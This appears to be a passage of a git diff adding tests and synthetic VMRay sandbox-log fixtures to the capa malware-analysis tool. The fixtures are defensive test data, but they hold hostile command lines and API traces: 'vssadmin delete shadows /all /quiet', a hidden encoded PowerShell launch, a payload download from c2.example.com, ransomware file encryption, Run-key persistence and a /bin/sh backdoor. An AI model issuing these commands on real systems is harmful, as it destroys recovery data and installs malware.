lpszUrl="http://ransom.example.com/key?id=ABCDEF0123456789", dwHeadersLength=0, dwFlags=0x80000000, dwContext=0) returned 0x4c9808 + [0001.014] HttpSendRequestW (hRequest=0x4c9808, lpszHeaders=NULL, dwHeadersLength=0, lpOptional=NULL, dwOptionalLength=0) returned 1 + [0001.015] CoTaskMemFree (pv=0x746aa0) + [0001.016] GetSystemInfo (lpSystemInfo=0x1000) + [0001.017] WaitForSingleObject (hHandle=0x200, dwMilliseconds=4294967295) returned 0x0 + [0001.018] ExitProcess (uExitCode=0) + +Thread: +id = "0002" +os_tid = "0x00001B01" + [0002.000] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=3, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x55 + [0002.001] ReadFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x11000, lpOverlapped=NULL) returned 1 + [0002.002] CryptEncrypt (hKey=0x3000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10000, pdwDataLen=0x12000, dwBufLen=4096) returned 1 + [0002.003] WriteFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x13000, lpOverlapped=NULL) returned 1 + [0002.004] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", lpNewFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", dwFlags=1) returned 1 + [0002.005] FindFirstFileW (lpFileName="C:\\Users\\victim\\*", lpFindFileData=0x14000) returned 0x56 + [0002.006] FindNextFileW (hFindFile=0x56, lpFindFileData=0x14000) returned 1 + [0002.007] CreateFileW (lpFileName="C:\\Users\\victim\\README_DECRYPT.txt", dwDesiredAccess=1073741824, dwShareMode=0, lpSecurityAttributes=NULL, dwCreationDisposition=2, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x57 + [0002.008] WriteFile (hFile=0x57, lpBuffer=0x15000, nNumberOfBytesToWrite=512, lpNumberOfBytesWritten=0x16000, lpOverlapped=NULL) returned 1 + +Process: +id = "0002" +os_pid = "0x00000BCE" +os_parent_pid = "0x00000ABC" +parent_id = "0001" +image_name = "vssadmin.exe" +filename = "c:\\windows\\system32\\vssadmin.exe" +cmd_line = "vssadmin.exe delete shadows /all /quiet" +monitor_reason = "child_process" + +Region: +id = "0020" +name = "private_0x0000000000020000" + +Thread: +id = "0003" +os_tid = "0x00002C00" + [0003.000] NtQuerySystemInformation (SystemInformationClass=0x5, SystemInformation=0x20000, SystemInformationLength=0x1000, ReturnLength=0x21000) returned 0x0 + [0003.001] OpenProcess (dwDesiredAccess=0x1F0FFF, bInheritHandle=0, dwProcessId=2748) returned 0x58 + [0003.002] VssDeleteSnapshots (pwszObjectName=NULL, eSourceObjectType=0x0, bForceDelete=TRUE) returned 0x80042302 diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt new file mode 100644 index 0000000000..0b9455cc65 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt @@ -0,0 +1,43 @@ +# Log Creation Date: 02.01.2025 12:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1234" +os_parent_pid = "0x1" +parent_id = "0" +image_name = "backdoor" +filename = "/tmp/backdoor" +cmd_line = "/tmp/backdoor" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "stack" + +Thread: +id = "1" +os_tid = "0x1234" + [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100 + [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6 + [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3 + [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4 + [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0 + [0001.006] sys_fork () returned 0x2345 + [0001.007] sys_getuid () returned 0x0 + [0001.008] sys_setuid (uid=0x0) returned 0x0 + [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0 + [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0 + [0001.011] sys_time (tloc=0x0) returned 0x677f2000 + [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 0000000000..0948939b00 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 0000000000..e7cab248a9 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = "analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_capabilities.py b/tests/test_capabilities.py index 809173da22..df44b9a45e 100644 --- a/tests/test_capabilities.py +++ b/tests/test_capabilities.py @@ -346,3 +346,28 @@ def test_instruction_subscope(z9324d_extractor): capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) assert "push 1000 on i386" in capabilities.matches assert 0x406F60 in {result[0] for result in capabilities.matches["push 1000 on i386"]} + + +def test_connected_blocks_subscope(z9324d_extractor): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected block helper + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.TerminateThread + """ + ) + ) + ] + ) + capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) + assert "connected block helper" in capabilities.matches diff --git a/tests/test_connected_blocks.py b/tests/test_connected_blocks.py new file mode 100644 index 0000000000..4419c13fa0 --- /dev/null +++ b/tests/test_connected_blocks.py @@ -0,0 +1,158 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import textwrap + +import capa.rules +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.features.extractors.null import ( + FunctionFeatures, + BasicBlockFeatures, + InstructionFeatures, + NullStaticFeatureExtractor, +) +from capa.features.extractors.base_extractor import BBHandle, SampleHashes +from capa.capabilities.common import find_capabilities + + +class GraphNullStaticExtractor(NullStaticFeatureExtractor): + def __init__(self, *args, edges=None, **kwargs): + super().__init__(*args, **kwargs) + self._edges = edges or {} + + def get_cfg_edges(self, f, bb): + for succ in self._edges.get(int(f.address), {}).get(int(bb.address), []): + yield BBHandle(AbsoluteVirtualAddress(succ), None) + + +def make_graph_extractor(): + fva = AbsoluteVirtualAddress(0x401000) + b0 = AbsoluteVirtualAddress(0x401000) + b1 = AbsoluteVirtualAddress(0x401100) + b2 = AbsoluteVirtualAddress(0x401200) + b3 = AbsoluteVirtualAddress(0x401300) + b4 = AbsoluteVirtualAddress(0x401400) + b5 = AbsoluteVirtualAddress(0x401500) + + return GraphNullStaticExtractor( + base_address=AbsoluteVirtualAddress(0x400000), + sample_hashes=SampleHashes(md5="", sha1="", sha256=""), + global_features=[], + file_features=[], + functions={ + fva: FunctionFeatures( + features=[], + basic_blocks={ + b0: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401001): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401001), API("CreateFileA"))] + ) + }, + ), + b1: BasicBlockFeatures(features=[], instructions={}), + b2: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401201): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401201), API("WriteFile"))] + ) + }, + ), + b3: BasicBlockFeatures( + features=[], + instructions={}, + ), + b4: BasicBlockFeatures( + features=[], + instructions={}, + ), + b5: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401501): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401501), API("CloseHandle"))] + ) + }, + ), + }, + ) + }, + edges={ + int(fva): { + int(b0): [int(b1)], + int(b1): [int(b2)], + int(b2): [int(b3)], + int(b3): [int(b4)], + int(b4): [int(b5)], + } + }, + ) + + +def test_connected_blocks_depth2_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks depth2 + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: WriteFile + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks depth2" in capabilities.matches + assert AbsoluteVirtualAddress(0x401000) in {m[0] for m in capabilities.matches["connected blocks depth2"]} + + +def test_connected_blocks_too_far_no_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks too far + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: CloseHandle + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks too far" not in capabilities.matches diff --git a/tests/test_proto.py b/tests/test_proto.py index b0dc106040..8ce69bac19 100644 --- a/tests/test_proto.py +++ b/tests/test_proto.py @@ -125,6 +125,7 @@ def test_addr_to_pb2(): def test_scope_to_pb2(): assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FILE) == capa_pb2.SCOPE_FILE assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FUNCTION) == capa_pb2.SCOPE_FUNCTION + assert capa.render.proto.scope_to_pb2(capa.rules.Scope.CONNECTED_BLOCKS) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.BASIC_BLOCK) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.INSTRUCTION) == capa_pb2.SCOPE_INSTRUCTION assert capa.render.proto.scope_to_pb2(capa.rules.Scope.PROCESS) == capa_pb2.SCOPE_PROCESS @@ -313,6 +314,17 @@ def assert_feature(fa, fb): elif isinstance(fa, capa.features.freeze.features.APIFeature): assert fa.api == fb.api + elif isinstance(fa, capa.features.freeze.features.ArgumentStringFeature): + assert fa.name == fb.name + assert fa.argument_string == fb.argument_string + + elif isinstance(fa, capa.features.freeze.features.ArgumentNumberFeature): + assert fa.name == fb.name + assert fa.argument_number == getattr(fb.argument_number, fb.argument_number.WhichOneof("value")) + + elif isinstance(fa, capa.features.freeze.features.ReturnValueFeature): + assert fa.return_value == getattr(fb.return_value, fb.return_value.WhichOneof("value")) + elif isinstance(fa, capa.features.freeze.features.PropertyFeature): assert fa.property == fb.property_ assert fa.access == fb.access diff --git a/tests/test_rules_insn_scope.py b/tests/test_rules_insn_scope.py index 86ebcd35b2..7402bb689e 100644 --- a/tests/test_rules_insn_scope.py +++ b/tests/test_rules_insn_scope.py @@ -131,6 +131,42 @@ def test_scope_instruction_description(): ) ) + +def test_rule_subscope_connected_blocks(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: test connected blocks subscope + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - mnemonic: mov + - arch: i386 + """ + ) + ) + ] + ) + + # parent function scope rule + derived connected-blocks subscope rule. + assert len(rules.function_rules) == 1 + assert len(rules.connected_block_rules) == 1 + + +def test_scope_connected_blocks_ordering(): + assert capa.rules.is_subscope_compatible(capa.rules.Scope.FUNCTION, capa.rules.Scope.CONNECTED_BLOCKS) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.INSTRUCTION) + assert not capa.rules.is_subscope_compatible(capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.CONNECTED_BLOCKS) + capa.rules.Rule.from_yaml( textwrap.dedent( """ diff --git a/tests/test_triage.py b/tests/test_triage.py new file mode 100644 index 0000000000..57a783f492 --- /dev/null +++ b/tests/test_triage.py @@ -0,0 +1,145 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.capabilities.triage import ( + REASON_CRT_NAME, + REASON_LARGE_COMPLEXITY, + REASON_TINY_NO_API, + TriageDecision, + classify_function, +) +from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, SampleHashes, StaticFeatureExtractor + + +class FakeInsn: + def __init__(self, mnem: str = "nop"): + self.mnem = mnem + + +class FakeFunction: + section_name = ".text" + + +class FakeTriageExtractor(StaticFeatureExtractor): + def __init__(self, names=None, function_data=None): + super().__init__(SampleHashes(md5="", sha1="", sha256="")) + self.names = names or {} + self.function_data = function_data or {} + + def get_base_address(self): + return AbsoluteVirtualAddress(0x0) + + def extract_global_features(self): + yield from () + + def extract_file_features(self): + yield from () + + def get_functions(self): + for fva in sorted(self.function_data): + yield FunctionHandle(AbsoluteVirtualAddress(fva), FakeFunction()) + + def get_function_name(self, addr): + if int(addr) not in self.names: + raise KeyError(addr) + return self.names[int(addr)] + + def extract_function_features(self, f): + yield from () + + def get_basic_blocks(self, f): + for bva in sorted(self.function_data[int(f.address)]["bbs"]): + yield BBHandle(AbsoluteVirtualAddress(bva), None) + + def extract_basic_block_features(self, f, bb): + yield from () + + def get_instructions(self, f, bb): + for iva, mnem in self.function_data[int(f.address)]["bbs"][int(bb.address)]: + yield InsnHandle(AbsoluteVirtualAddress(iva), FakeInsn(mnem)) + + def extract_insn_features(self, f, bb, insn): + for feature in self.function_data[int(f.address)].get("insn_features", {}).get(int(insn.address), ()): + yield feature, insn.address + + +def test_triage_classify_crt_name_skip(): + extractor = FakeTriageExtractor( + names={0x401000: "__security_init_cookie"}, + function_data={0x401000: {"bbs": {0x401000: [(0x401000, "ret")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x401000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_CRT_NAME + + +def test_triage_classify_tiny_no_api_skip(): + extractor = FakeTriageExtractor( + names={0x402000: "sub_402000"}, + function_data={0x402000: {"bbs": {0x402000: [(0x402000, "nop"), (0x402001, "nop")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x402000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_TINY_NO_API + + +def test_triage_classify_large_function_deprioritize(): + insns = [(0x500000 + i, "nop") for i in range(4096)] + extractor = FakeTriageExtractor( + names={0x500000: "sub_500000"}, + function_data={0x500000: {"bbs": {0x500000: insns}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x500000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.DEPRIORITIZE + assert result.reason == REASON_LARGE_COMPLEXITY + + +def test_triage_api_presence_prevents_tiny_skip(): + extractor = FakeTriageExtractor( + names={0x403000: "sub_403000"}, + function_data={ + 0x403000: { + "bbs": {0x403000: [(0x403000, "call"), (0x403001, "ret")]}, + "insn_features": {0x403000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x403000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE + + +def test_triage_api_feature_evidence_prevents_thunk_skip(): + extractor = FakeTriageExtractor( + names={0x404000: "sub_404000"}, + function_data={ + 0x404000: { + "bbs": {0x404000: [(0x404000, "jmp")]}, + "insn_features": {0x404000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x404000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 0000000000..9937703cce --- /dev/null +++ b/tests/test_vmray_flog_txt.py @@ -0,0 +1,798 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for VMRay flog.txt parser (#2452).""" + +from pathlib import Path + +import pytest + +import capa.features.insn +import capa.features.common +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.flog_txt import _parse_args, _parse_event, _parse_hex_or_decimal +from capa.features.extractors.vmray.extractor import VMRayExtractor + +# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they +# are always present in CI without requiring the capa-testfiles submodule). +FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt" + + +MINIMAL_FLOG_TXT = """ +# Log Creation Date: 08.10.2024 18:12:03 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x118c" +os_parent_pid = "0x7d8" +parent_id = "0" +image_name = "svchost.exe" +filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe" +cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" " +monitor_reason = "analysis_target" + +Region: +id = "125" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x117c" + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 +""" + + +def test_parse_flog_txt_minimal(tmp_path): + # Write as binary so newlines are exactly \n (avoids Windows \r\n) + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b"Process:\n" + b'id = "1"\n' + b'os_pid = "0x118c"\n' + b'image_name = "svchost.exe"\n' + b'filename = "test.exe"\n' + b'monitor_reason = "analysis_target"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'cmd_line = ""\n\n' + b"Thread:\n" + b'id = "1"\n' + b'os_tid = "0x117c"\n' + b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + assert len(flog.analysis.monitor_processes) == 1 + proc = flog.analysis.monitor_processes[0] + assert proc.image_name == "svchost.exe" + assert proc.process_id == 1 + assert proc.os_pid == 0x118C + assert len(flog.analysis.monitor_threads) == 1 + thread = flog.analysis.monitor_threads[0] + assert thread.thread_id == 1 + assert thread.process_id == 1 + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "GetCurrentProcess" + + +def test_parse_flog_txt_rejects_wrong_header(): + with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): + flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") + + +def test_parse_flog_txt_sys_prefix_stripped(tmp_path): + # Linux kernel calls start with sys_; parser should strip for consistency with XML + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "time" + + +def test_vmray_analysis_from_flog_txt(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + from capa.features.extractors.vmray import VMRayAnalysis + + analysis = VMRayAnalysis.from_flog_txt(path) + assert analysis.submission_name == "flog.txt" + assert analysis.submission_type == "unknown" + assert analysis.submission_meta is not None + assert analysis.submission_static is None + assert len(analysis.monitor_processes) == 1 + assert len(analysis.monitor_process_calls) >= 1 + + +def test_vmray_extractor_from_flog_txt(tmp_path): + from capa.features.address import NO_ADDRESS + + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + ext = VMRayExtractor.from_flog_txt(path) + assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt + procs = list(ext.get_processes()) + assert len(procs) == 1 + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 3 + + +def test_parse_flog_txt_args_parsed(tmp_path): + """API call arguments are parsed into Param objects for feature extraction.""" + 